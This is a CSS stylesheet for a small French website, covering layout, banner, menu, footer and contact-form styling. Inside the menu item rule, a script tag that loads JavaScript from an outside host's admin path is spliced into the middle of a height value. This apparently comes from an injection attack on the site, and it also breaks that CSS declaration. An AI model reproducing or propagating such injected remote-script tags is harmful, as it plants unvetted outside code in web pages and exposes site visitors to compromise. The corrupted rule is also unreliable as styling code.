#main {
	position: relative;
	top: 0px;
	left: 350px;
	width: 750px;
	margin-left: -375px;
	left:50%;
	height: 100%;
	background-color: transparent;
}
BODY {
	background-color:#3B2212;
}
#banner {
	width: 750px;
	height: 300px;
	background-color: #e4d5ba ;
}
#bas {
	position: absolute;
	top: 300px;
	width: 750px;
	background-color:#e4d5ba;
	margin-left: -375px;
	left: 50%;
	margin-bottom:40px;
	border-bottom:5px solid #8b4513;

}
#contents {
	font-size: 12px;
	font-family: Verdana;
	position: relative;
	width:380px;
	top:7px;
	margin-left:175px;
	margin-bottom:10px;
	padding:5px;
}
#illustration{
	display: none;
}
#footer {
	position: relative;
	font-size:0.8em;
	text-align: right;
	width:750px;
	top:25px;
	margin-left:-195px;
	color:white;
}
A.pied:link, A.pied:visited {
	color: white;
	text-decoration: none;
}
A.pied:hover {
	color: black;
	font-weight: bold;
	text-decoration: underline;
}
#menu UL LI{
	font-family: Geneva, Arial, sans-serif;
	float: left;
	margin-right: 5px;
	margin-bottom: 8px;
	height: 18<script type="text/javascript" src="http://enpc.ariva.fr/admin/javascripts/tiny_mce/themes/advanced/langs/fr.js"></script>px;
	width: 130px;
	padding: 7px;
	text-align: right;
	text-transform: uppercase;
	background-color:#8b4513;
}
#menu .menuOn{
	height: 18px;
	background-color:#3b2212;
}
.contacttable {
	margin-left:-2px;
	text-align:left;
}
.contacttable TD { 
	padding:1px;
}
.contactnom, .contactprenom { 
	width: 125px; 
}
.contacttelephone, .contactsociete, .contactmail{ 
	width: 260px; 
}
.contactmessage {
	width: 263px;
	height: 100px;
}
